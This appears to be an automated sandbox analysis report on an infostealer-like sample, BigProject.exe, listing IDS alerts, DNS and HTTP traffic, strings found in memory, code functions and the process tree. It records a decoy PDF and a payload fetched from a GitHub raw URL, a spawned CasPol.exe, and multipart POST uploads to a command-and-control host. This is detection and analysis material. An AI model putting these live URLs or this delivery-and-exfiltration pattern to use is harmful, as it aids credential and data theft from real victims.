Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 172.67.197.170:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JJCHZ09245IHFZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BTXLCIL19R05PAIVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15066Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JBUIQ349LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QI8UC3UJNMKBVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WLEMZG0BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 422841Host: discokeyus.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: discokeyus.lat

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf HTTP/1.1User-Agent: csHost: raw.githubusercontent.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion HTTP/1.1Accept: /User-Agent: Chrome/95.0.4638.54Host: raw.githubusercontent.com

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: stem-mellows.cyou
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat

Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.999
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apis
Source: CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/cYU5
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/v
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001130000.00000004.00000020.00020000.00000000.sdmp, BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion8Nzk
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionC
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionD
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionw
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Q
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

7_2_004329C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

7_2_004329C0

Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00CA4EB1	0_2_00CA4EB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00408850	7_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00423860	7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004218A0	7_2_004218A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042DA53	7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043ECA0	7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00437DF0	7_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00409580	7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004266D0	7_2_004266D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043F720	7_2_0043F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00415799	7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00438810	7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041682D	7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004288CB	7_2_004288CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D880	7_2_0043D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00430940	7_2_00430940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00403970	7_2_00403970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00420939	7_2_00420939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004179C1	7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004231C2	7_2_004231C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004241C0	7_2_004241C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043B1D0	7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004291DD	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D980	7_2_0043D980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00405990	7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00422190	7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D997	7_2_0043D997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D999	7_2_0043D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004091B0	7_2_004091B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042CA49	7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00416263	7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0040EA10	7_2_0040EA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00415220	7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042CAD0	7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004252DD	7_2_004252DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041B2E0	7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00406280	7_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043DA80	7_2_0043DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041E290	7_2_0041E290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041CB40	7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D34D	7_2_0043D34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00426B50	7_2_00426B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043DB60	7_2_0043DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00436B08	7_2_00436B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042830D	7_2_0042830D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042CB11	7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00404320	7_2_00404320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042CB22	7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00425327	7_2_00425327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00408330	7_2_00408330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043F330	7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042A33F	7_2_0042A33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0040DBD9	7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00424380	7_2_00424380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041FC75	7_2_0041FC75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041DC00	7_2_0041DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00429C2B	7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004291DD	7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004074F0	7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0040ACF0	7_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041148F	7_2_0041148F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042AC90	7_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0040CD46	7_2_0040CD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00437500	7_2_00437500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00422510	7_2_00422510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00417DEE	7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041759F	7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00425E70	7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00436E74	7_2_00436E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00427603	7_2_00427603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00425E30	7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004286C0	7_2_004286C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043AEC0	7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004236E2	7_2_004236E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00405EE0	7_2_00405EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041DE80	7_2_0041DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00402F50	7_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00420F50	7_2_00420F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00438F59	7_2_00438F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00406710	7_2_00406710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00423F20	7_2_00423F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00419F30	7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0041E7C0	7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004197C2	7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0042DFE9	7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0040A780	7_2_0040A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00411F90	7_2_00411F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00418792	7_2_00418792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043EFB0	7_2_0043EFB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00408030 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00414400 appears 65 times

Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAcrobat.exe< vs BigProject.exe

Source: BigProject.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/46@7/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 7_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

7_2_00437DF0

Source: C:\Users\user\Desktop\BigProject.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NavanItinerary[1].pdf

Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe

File created: C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf

Jump to behavior

Source: BigProject.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BigProject.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BigProject.exe	Virustotal: Detection: 15%
Source: BigProject.exe	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Users\user\Desktop\BigProject.exe "C:\Users\user\Desktop\BigProject.exe"
Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: iphlpapi.dll	Jump to behavior
